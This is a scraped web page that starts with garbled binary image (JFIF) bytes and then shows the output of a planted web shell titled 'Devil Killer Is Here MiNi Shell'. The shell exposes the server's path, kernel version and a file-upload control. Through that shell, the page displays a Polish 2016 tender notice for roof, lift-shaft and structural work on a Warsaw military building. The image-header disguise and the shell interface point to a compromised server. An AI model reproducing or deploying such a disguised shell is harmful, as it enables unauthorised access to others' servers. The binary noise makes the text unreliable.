JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160516/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160516/54391-N-2016.html

<p class="kh_header"><b>Nowy Dwór Mazowiecki: SVA/NDM/4620-39/16: Wykonanie robót budowlanych w budynku nr 65 w kompleksie wojskowym nr 6077 przy ul. Żwirki i Wigury 1c w Warszawie - zad. 01336</b><br>
<b>Numer ogłoszenia: 54391 - 2016; data zamieszczenia: 16.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> SINEVIA Sp. z o.o. , ul. Ignacego Paderewskiego 6, 05-100 Nowy Dwór Mazowiecki, woj. mazowieckie, tel. 22 101 21 00 do 03, faks 22 101 21 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sinevia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SVA/NDM/4620-39/16: Wykonanie robót budowlanych w budynku nr 65 w kompleksie wojskowym nr 6077 przy ul. Żwirki i Wigury 1c w Warszawie - zad. 01336.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych w budynku nr 65 w kompleksie wojskowym 
nr 6077 przy ul. Żwirki i Wigury 1c w Warszawie w następującym zakresie:
I.	ROZBIÓRKI I DEMONTAŻE KONSTRUKCJI:
1.	roboty rozbiórkowe, elementy betonowe zbrojone,
2.	roboty rozbiórkowe, elementy betonowe niezbrojone, grubości do 15 cm,
3.	roboty rozbiórkowe, elementy betonowe niezbrojone, grubości ponad 15 cm, ściany betonowe fundamentowe.
II.	ROZBIÓRKI NA DACHACH:
1.	rozbiórka pokrycia z papy, dach betonowy,
2.	zerwanie warstwy wyrównawczej cementowej,
3.	demontaż izolacji cieplnej i przeciwdźwiękowej z płyt styropianowych, izolacje poziome na wierzchu konstrukcji, na lepiku,
4.	wypełnienie styków płyt korytkowych i ścian kolankowych, poziome, kitem, trwale plastycznym, 
5.	warstwy wyrównawcze pod posadzki, z zaprawy cementowej, zatarte na ostro.	
III.	KOMINY NA DACHU:
1.	rozebranie obróbek blacharskich: murów ogniowych, okapów kołnierzy, gzymsów itp. z blachy nie nadającej się do użytku	, 
2.	roboty rozbiórkowe, betonowe czapki kominowe,
3.	rozebranie kominów wolno stojących na dachu,
4.	kominy wolno stojące w budynkach, wieloprzewodowe, przewód 1/2x1/2 cegły,
5.	podstawy dachowe laminatowe prostokątne, w układach kanałowych, o obwodach do 2520 mm,
6.	podstawy dachowe laminatowe prostokątne, w układach kanałowych, o obwodach do 3260 mm,
7.	podstawy dachowe laminatowe prostokątne, w układach kanałowych, o obwodach powyżej 4460 mm,
8.	wywietrzniki dachowe montowane na podstawach laminatowych, o średnicy do 200 mm, 
typ BRYZA-150,
9.	przebicie otworów w elementach z betonu o powierzchni do 0,05 m2, beton żwirowy, grubość do 
10 cm, przebicia w płytach korytkowych pod wywietrzniki dachowe do wentylacji poddasza,
10.	wywietrzniki dachowe do wentylacji poddasza, o średnicy do 200 mm, typ Fi 110/200,
11.	uzupełnienie ścianek z cegieł lub zamurowanie otworów w ściankach, zaprawa cementowo-wapienna, ścianki grubości 1/2 cegły,
12.	deskowanie elementów betonowych i żelbetowych, płyty stropowe i dachowe, zaślepienie otworów po wyburzonych kominach,
13.	uzupełnienie elementów konstrukcyjnych z betonu monolitycznego, zbrojone płyty stropowe, beton 
B-20, zaślepienie otworów po wyburzonych kominach,
14.	przekrycia otworów w płytach dachowych korytkowych z płyt ze sklejki wodoodpornej grubości 
24 mm,
15.	warstwy wyrównawcze pod posadzki, z zaprawy cementowej grubości 20 mm, zatarte na ostro,
16.	uzupełnienie rolek, poziomo, zaprawa cem-wap, szerokość 1 cegły,	
17.	uzupełnienie murów ogniowych i kolankowych, zaprawa cem-wap, grubość 1 cegły,	
18.	uzupełnienie tynków zewnętrznych zwykłych kategorii III (ściany, loggie, balkony), podłoże: cegła, pustaki ceramiczne, gazo- i pianobeton,	
19.	uzupełnienie gładzi cementowej na rolkach z cegieł, poziomo, szerokość 1 cegły,
20.	deskowanie połaci dachowych z tarcicy nasyconej, deski gr. 25 mm	
21.	lakierowanie 2-krotne elementów drewnianych środkiem impregnacyjno-grzybobójczym85 d.5,
22.	izolacje cieplne i przeciwdźwiękowe z wełny mineralnej granulowanej, pozioma grubości po opadzie 
20 cm,
23.	pokrycie dachów o nachyleniu połaci do 85% blachą powlekaną trapezową na łatach, dachy 25-50 m2, blacha T160x1,15,
24.	podkłady, betonowe na stropie, beton z keramzytu,
25.	okładziny pojedyncze z płyt Promaxon typ A na stropach, płyty grubości 8,0 mm,
26.	warstwy wyrównawcze pod posadzki, z zaprawy cementowej grubości średniej 20 mm, zatarte na ostro,
27.	gruntowanie podłoży, powierzchnie poziome, preparatem Simplast Primer Szybki Grunt SBS,	
28.	izolacja z folii polietylenowej, przymocowanej do blachy trapezowej, folia paroizolacyjna,
29.	izolacje cieplne i przeciwdźwiękowe z wełny mineralnej, pozioma z płyt układanych na sucho, 
1 warstwa, płyta Dachrock Max gr. 18 cm,
30.	izolacje cieplne i przeciwdźwiękowe z płyt ze styropapy laminowanej 2-stronnie gr. 10 cm, izolacje poziome na wierzchu konstrukcji, na lepiku,
31.	ocieplenie dachu płytami z wełny mineralnej, przymocowanie płyt łącznikami metalowymi,
32.	pokrycie dachów papą termozgrzewalną, , papa podkładowa FireSmart Duo Baza, papa wierzchniego krycia FireSmart Duo Top Szybki profil SBS,
33.	pokrycie dachów papą termozgrzewalną, papa podkładowa aktywowana termicznie z funkcją wentylacji podłoża Wentylacja Baza 3 Szybki Syntan SBS, papa wierzchniego krycia Extradach Top 5,2 Szybki Profil,
34.	izolacje przeciwwilgociowe powłokowe bitumiczne poziome - wykonywane na zimno, lakier zabezpieczający Silver Primer Szybki Lakier SBS, 1 warstwa,
35.	pokrycie dachów papą termozgrzewalną, obróbki z papy, papa wierzchniego krycia FireSmart Duo Top Szybki profil SBS,
36.	montaż kominków wentylacyjnych przy pokryciu dachu papą.	
IV.	SZYBY WINDOWE:
1.	podkłady, betonowe na podłożu gruntowym, beton podawany pompą, zwykły B-10,
2.	izolacje przeciwwilgociowe powierzchni poziomych, papą na lepiku na zimno, 1 warstwa, izolacja fundamentów,	
3.	izolacje przeciwwilgociowe powierzchni poziomych, papą na lepiku na zimno, dodatek za następną warstwę,
4.	zbrojenie konstrukcji monolitycznych budowli, pręty stalowe okrągłe gładkie,	
5.	zbrojenie konstrukcji monolitycznych budowli, pręty stalowe okrągłe żebrowane, Fi 16 mm i większe	
6.	płyty fundamentowe żelbetowe, beton B-25,	
7.	ściany żelbetowe w deskowaniu U-Form i Stal-Form, deskowanie U-Form, (grubość 10 cm) wysokość do 4,0 m, wariant III wykonania, beton B-25,	
8.	ściany żelbetowe w deskowaniu U-Form i Stal-Form, deskowanie U-Form i Stal-Form, dodatek za każdy następny 1 cm grubości, wariant III wykonania, dodatkowe 10 cm Krotność = 10,	
9.	stemplowania w wysokości do 4 m deskowań konstrukcji,
10.	stropy w deskowaniu U-Form, grubości 10 cm, powierzchnia między belkami lub ścianami ponad 10 m2, wariant III wykonania, beton B-25,	
11.	belki, podciągi i wieńce żelbetowe w deskowaniu U-Form, obwód/przekrój: do 16 (m/m2), wariant III wykonania, beton B-25,	
12.	izolacje przeciwwilgociowe powłokowe bitumiczne pionowe wykonywane na zimno, roztwór asfaltowy Abizol R+P,
13.	tynki zwykłe wykonywane ręcznie, ściany i słupy, kategoria III,
14.	gruntowanie podłoży, powierzchnie pionowe, preparatem Atlas Uni Grunt,	
15.	tynki wewnętrzne 1-warstwowe grubości 3 mm z gipsu szpachlowego wykonywane ręcznie, ściany, podłoże z tynku,	
16.	gruntowanie podłoży, powierzchnie pionowe, preparatem Atlas Uni Grunt,	
17.	malowanie farbami lateksowymi wewnętrznych tynków gładkich bez gruntowania, 2-krotne,	
18.	konstrukcje rusztów z kształtowników aluminiowych BSP-System w rozstawie co 60 cm,	
19.	izolacje cieplne i przeciwdźwiękowe z wełny mineralnej, pionowa z płyt układanych na sucho, płyta Wentirock F gr. 120 mm,
20.	ocieplenie ścian płytami z wełny mineralnej, przymocowanie płyt łącznikami metalowymi,	
21.	deskowanie ścian z płyt OSB-IV gr. 15 mm,	
22.	izolacja z membrany separacyjnej Delta VM Zinc gr. 8,6 mm,	
23.	pokrycie ścian blachą cynkowo-tytanową gr. 0,70 mm, powierzchnie 50-100 m2.
V.	DŹWIGI:
1.	dźwigi osobowe o szybkości do 1 m/sek z drzwiami automatycznymi o nośności do 1000 kg i wysokości kondygnacji 2,80 m dla budownictwa mieszkaniowego i ogólnego, wysokość podnoszenia do 2 przystanków, dźwig typu OTIS Gen2 Premier - 1 kpl.,
2.	próby po montażu, regulacja i odbiory dźwigów, dźwigi towarowe, towarowo - osobowe i osobowe o nośności do 1000 kg, szybkość 1 m/sek, wysokość podnoszenia do 2 przystanków.	
VI. KONSTRUKCJE ŻELBETOWE:
1.	skucie powierzchni otworów stropowych betonowych do zaślepienia, głębokość do 5 cm,	
2.	deskowanie elementów betonowych i żelbetowych, płyty stropowe i dachowe, wypełnienie otworów po kominach,
3.	uzupełnienie elementów konstrukcyjnych z betonu monolitycznego, zbrojone płyty stropowe, beton B-20, wypełnienie otworów po kominach.	
VII.	KONSTRUKCJE STALOWE:
1.	przebicie otworów w elementach z betonu o powierzchni do 0,05 m2, beton żwirowy, grubość do 
10 cm,
2.	uzupełnienie elementów konstrukcyjnych z betonu monolitycznego, płyty stropowe, beton B-25,
3.	podkład z płyt ze szkła piankowego grubości 50 mm, izolacja pozioma na sucho,	
4.	podkład z płyt ze sklejki wodoodpornej grubości 24 mm, izolacje poziome na sucho, 1 warstwa,
5.	uszczelnienie przejścia przez dach za pomocą kołnierza uszczelniającego typu Master Flash,
6.	ręczne wykonanie ślepych otworów w betonie, głębokość do 8 cm, średnica do 20 mm,	
7.	osadzenie w podłożu kołków kotwiących Fischer FBN II 12/120, w posadzce,	
8.	wykonanie na budowie i montaż konstrukcji skręcanych na śruby, ruszt pod centrale wentylacyjne, stal St3SX,
9.	wykonanie na budowie i montaż konstrukcji skręcanych na śruby, masa elementu 100 kg, ruszt pod agregaty skraplające, stal St3SX,
10.czyszczenie przez szczotkowanie ręczne do 2 stopnia czystości - stan wyjściowy powierzchni B, konstrukcje kratowe,	
11. odtłuszczanie, konstrukcje kratowe,	
12. malowanie pędzlem - farby do gruntowania chlorokauczukowe, konstrukcje kratowe, farba ogólnego stosowania,	
13. malowanie pędzlem - emalie chlorokauczukowe, konstrukcje kratowe, emalia ogólnego stosowania.
VIII. ELEMENTY Z BLACHY:
1.	rozebranie rynien z blachy nie nadającej się do użytku,
2.	rozebranie rur spustowych z blachy nie nadającej się do użytku,	
3.	rozebranie obróbek blacharskich: murów ogniowych, okapów kołnierzy, gzymsów itp. z blachy nie nadającej się do użytku,
4.	wykucie z muru, podokienników stalowych,	
5.	obróbki blacharskie z blachy powlekanej, szerokość w rozwinięciu ponad 25 cm, gr. blachy 0,70 mm,
6.	rynny dachowe z blachy ocynkowanej powlekanej, półokrągłe o średnicy 15 cm, rynna LINDAB Rainline, 
7.	izolacje cieplne z płyt ze szkła piankowego grubości 80 mm, izolacja pionowa na zaprawie,
8.	belka drewniana o długości ponad 2 m, przekrój poprzeczny drewna do 180 cm2,	
9.	rury spustowe z blachy ocynkowanej powlekanej, rury spustowe okrągłe o średnicy 10 cm, rura spustowa LINDAB Rainline.	
IX.	 WYWÓZ MATERIAŁÓW DO UTYLIZACJI:
1.	wywiezienie gruzu z terenu rozbiórki przy ręcznym załadowaniu i mechanicznym wyładowaniu samochodem samowyładowczym, na odległość do 1 km, całkowita odległość 40 km,	
2.	wywiezienie papy z terenu rozbiórki przy ręcznym załadowaniu i mechanicznym wyładowaniu samochodem samowyładowczym, dodatek za każdy dalszy rozpoczęty 1 km ponad 1 km. Zakres zamówienia ujęty jest w dokumentacji technicznej.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.00.00-1, 45.26.10.00-4, 45.26.23.00-4, 45.26.23.10-7, 45.31.31.00-5, 45.22.32.10-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków 
w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku, gdy Wykonawca wykaże się doświadczeniem w wykonaniu w okresie ostatnich pięciu lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 robót budowlanych odpowiadających swoim rodzajem robocie budowlanej stanowiącej przedmiot zamówienia. Za robotę budowlaną odpowiadającą swoim rodzajem robocie budowlanej stanowiącej przedmiot zamówienia uważa się wykonanie pokrycia dachu wraz z obróbkami blacharskimi oraz wykonanie szybu windowego wraz z dostawą i montażem dźwigu. Przy czym każda z dwóch  robót budowlanych odpowiadająca swoim rodzajem robocie budowlanej stanowiącej przedmiot zamówienia, powinna być wartości co najmniej 250 000,00 PLN brutto każda wraz z dowodami, że roboty zostały wykonane zgodnie 
z zasadami sztuki budowlanej i prawidłowo ukończone. 
Zamawiający dopuszcza wykazanie tych robót w oddzielnych zadaniach. W takim przypadku roboty te zostaną zsumowane i będzie to traktowane jako wykonanie jednej roboty budowlanej. Przy czym każda 
z dwóch  robót budowlanych odpowiadająca swoim rodzajem robocie budowlanej stanowiącej przedmiot zamówienia, powinna być wartości co najmniej 250 000,00 PLN brutto każda wraz z dowodami,  że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Przy składaniu oferty wspólnej o udzielenie zamówienia Zamawiający dopuszcza możliwość udokumentowania doświadczenia w postaci wykazania realizacji robót w poszczególnych robotach budowlanych, z zastrzeżeniem, że łączna ich wartość wyniesie 250 000,00 PLN brutto i będzie traktowane jako wykazanie jednej roboty budowlanej.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz z zastosowaniem art. 26 ust. 2b, warunek wiedzy i doświadczenia winien spełniać co najmniej jeden z tych Wykonawców, 
z zastrzeżeniem, że Zamawiający dopuszcza możliwość sumowania doświadczenia wszystkich Wykonawców poprzez dodanie do siebie robót z różnych zakresów (wykonanie pokrycia dachu wraz 
z obróbkami blacharskimi oraz wykonanie szybu windowego wraz z dostawą i montażem dźwigu)  np. jeden wykonawca wykonał dwie roboty w zakresie wykonania pokrycia dachu wraz z obróbkami blacharskimi; drugi wykonawca wykonał dwie roboty w zakresie wykonania szybu windowego wraz 
z dostawą i montażem dźwigu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków 
w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku, gdy Wykonawca wykaże że dysponuje lub będzie dysponował, co najmniej 9 osobami, które będą uczestniczyć w wykonaniu tego zamówienia w tym:  
a)	 1 kierownika robót posiadającego uprawnienia budowlane do kierowania robotami bez ograniczeń 
w specjalności konstrukcyjno-budowlanej,
b)	  8 robotników budowlanych
lub przedstawią pisemne zobowiązanie innych podmiotów do oddania im do dyspozycji niezbędnych osób na okres korzystania z nich do wykonania zamówienia.   Kwalifikacje powyższych pracowników muszą obejmować wszystkie kategorie robót związane z  realizacją przedmiotu  umowy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku, gdy Wykonawca wykaże się posiadaniem a)	środków finansowych lub zdolności kredytowej w wysokości nie mniejszej niż 50 000,00 zł,
b)	ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej 
z przedmiotem zamówienia na kwotę nie niższą niż 450 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Dla Zamawiającego wystarczającym jest przedstawienie przez Wykonawcę wykazu, który zawiera główne roboty budowlane tj. roboty budowlane określone w opisie sposobu dokonywania oceny spełnienia tego warunku. Zamawiający nie oczekuje informacji o wszystkich robotach budowlanych. Zgodnie z zapisem art. 24 ust. 2a ustawy Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wykluczy 
z postępowania o udzielenie zamówienia Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>W przypadku, gdy wykonawca polega na zasobach innych podmiotów, podmiot ten zobowiązany jest do złożenia zobowiązania o solidarnej odpowiedzialności;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

